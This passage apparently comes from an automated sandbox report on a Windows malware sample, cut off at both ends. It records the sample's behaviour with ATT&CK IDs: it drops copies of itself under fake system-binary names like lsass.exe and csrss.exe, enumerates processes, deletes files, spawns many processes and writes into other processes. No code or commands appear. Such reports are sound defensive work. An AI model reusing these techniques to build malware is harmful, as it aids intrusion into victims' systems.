[%LOCALAPPDATA%\\WINDOWS\\SERVICES.EXE]- [targetUID: 00000000-00005040]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\SMSS.EXE]- [targetUID: 00000000-00005040]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE]- [targetUID: 00000000-00005040]\n \"IEXPLORER.EXE.67EE48F7.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"MrD3_08.scr\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\MrD3_08.scr]- [targetUID: 00000000-00005040]\n \"IEXPLORER.EXE.67EE4660.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"D3_08.EXE.67EE4804.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"lsass.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\lsass.exe]- [targetUID: 00000000-00003404]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\IExplorer.exe]- [targetUID: 00000000-00005040]\n \"winlogon.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\winlogon.exe]- [targetUID: 00000000-00003404]\n \"IExplorer.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\IExplorer.exe]- [targetUID: 00000000-00005040]\n \"smss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\smss.exe]- [targetUID: 00000000-00003404]\n \"D3_08.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\D3_08.exe]- [targetUID: 00000000-00005040]\n \"csrss.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\csrss.exe]- [targetUID: 00000000-00003404]\n \"New Folder.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [C:\\D3_08\\New Folder.exe]- [targetUID: 00000000-00003404]\n \"LSASS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\LSASS.EXE]- [targetUID: 00000000-00005040]\n \"SERVICES.EXE.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"SMSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\SMSS.EXE]- [targetUID: 00000000-00005040]\n \"SERVICES.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\SERVICES.EXE]- [targetUID: 00000000-00005040]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\WINLOGON.EXE]- [targetUID: 00000000-00005040]\n \"WINLOGON.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINLOGON.EXE]- [targetUID: 00000000-00005040]\n \"D3_08.EXE.67EE4D0E.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\CSRSS.EXE]- [targetUID: 00000000-00005040]\n \"D3_08.EXE.67EE465D.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"CSRSS.EXE\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE]- [targetUID: 00000000-00005040]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-223", "type": 6, "relevance": 3, "name": "Calls an API typically used to query local/system time as file time", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FileTimeToLocalFileTime\" with parameter f09f918161a4db01 & f06f1a4572a4db01 (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FileTimeToSystemTime\" (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FileTimeToLocalFileTime\" with parameter c332966d61a4db01 & c3021f3172a4db01 (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FileTimeToLocalFileTime\" with parameter 30e5fef92b04ca01 & 30b587bd3c04ca01 (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FileTimeToLocalFileTime\" with parameter 42ad8c6d61a4db01 & 427d153172a4db01 (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"FileTimeToLocalFileTime\" with parameter 8e35a98361a4db01 & 8e05324772a4db01 (UID: 00000000-00003404)", "origin": "API Call", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "api-104", "type": 6, "relevance": 5, "name": "Calls an API typically used to enumerate process encountered in a system snapshot", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"Process32FirstW with parameter [System Process]\" (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"Process32NextW with parameter System\" (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"Process32NextW with parameter smss.exe\" (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"Process32NextW with parameter csrss.exe\" (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"Process32NextW with parameter wininit.exe\" (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"Process32NextW with parameter winlogon.exe\" (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"Process32NextW with parameter services.exe\" (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"Process32NextW with parameter lsass.exe\" (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"Process32NextW with parameter lsm.exe\" (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"Process32NextW with parameter svchost.exe\" (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"Process32NextW with parameter spoolsv.exe\" (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"Process32NextW with parameter taskhost.exe\" (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"Process32NextW with parameter dwm.exe\" (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"Process32NextW with parameter explorer.exe\" (UID: 00000000-00003404)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" called \"Process32NextW with parameter WmiPrvSE.exe\" (UID: 00000000-00003404)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" marked \"C:\\share\\D3_08\\New Folder.exe\" for deletion\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" marked \"C:\\share\\Data %OSUSER%.exe\" for deletion\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" for deletion\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" for deletion\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\winlogon.exe\" for deletion\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\services.exe\" for deletion\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\lsass.exe\" for deletion\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\IExplorer.exe\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SMSS.EXE\" with delete access\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SMSS.EXE\" with delete access\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SMSS.EXE\" with delete access\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\CSRSS.EXE\" with delete access\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\CSRSS.EXE\" with delete access\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\CSRSS.EXE\" with delete access\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" with delete access\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\WINLOGON.EXE\" with delete access\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\WINLOGON.EXE\" with delete access\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" with delete access\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\SERVICES.EXE\" with delete access\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\SERVICES.EXE\" with delete access\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\SERVICES.EXE\" with delete access\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\LSASS.EXE\" with delete access\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\LSASS.EXE\" with delete access\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\LSASS.EXE\" with delete access\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"C:\\Users\\%OSUSER%\\Local Settings\\APPLICATION DATA\\D3_08.EXE\" with delete access\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Application Data\\D3_08.EXE\" with delete access\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\D3_08.EXE\" with delete access\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched \"K:\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched \"L:\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched \"M:\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched \"N:\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched \"O:\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched \"P:\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched \"Q:\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched \"R:\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched \"S:\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched \"T:\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched \"U:\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched \"V:\"\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" touched \"W:\"", "origin": "API Call", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" (UID: 00000000-00003404)\n Spawned process \"D3_08.exe\" (UID: 00000000-00002520)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002088)\n Spawned process \"D3_08.exe\" (UID: 00000000-00002736)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003320)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005040)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005084)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004612)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003580)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002756)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005064)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004808)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00000944)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005216)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005060)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005052)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005116)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004768)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004716)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00001340)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002904)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004120)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005240)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00003492)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005136)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005404)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005344)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003420)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002648)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005412)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005296)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005172)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003288)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005524)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005548)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005472)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005132)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005868)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005844)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005940)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005932)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004384)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00004276)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00006036)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00001644)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004312)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00006056)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00005772)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00002100)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004272)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005992)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00006092)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005988)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003432)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 368)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 368)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 368)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 376)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 376)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 376)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 368)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 368)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 368)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 376)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 376)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 376)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 368)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 368)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 368)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 376)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 376)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 376)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 368)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 368)\n \"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 368)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 372)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 372)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 372)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 372)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 372)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 372)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 372)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 372)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 372)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 372)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 372)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 372)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 424)\n \"IExplorer.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 416)\n \"IExplorer.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 416)\n \"IExplorer.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 416)\n \"IExplorer.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 372)\n \"IExplorer.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 372)\n \"IExplorer.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 372)\n \"IExplorer.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 416)\n \"IExplorer.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 416)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"05c8995dda08e933194b83809cc6f0aa59d957d2c7d55d94ea71ae26f00ce6e1.exe\" allocated memory in 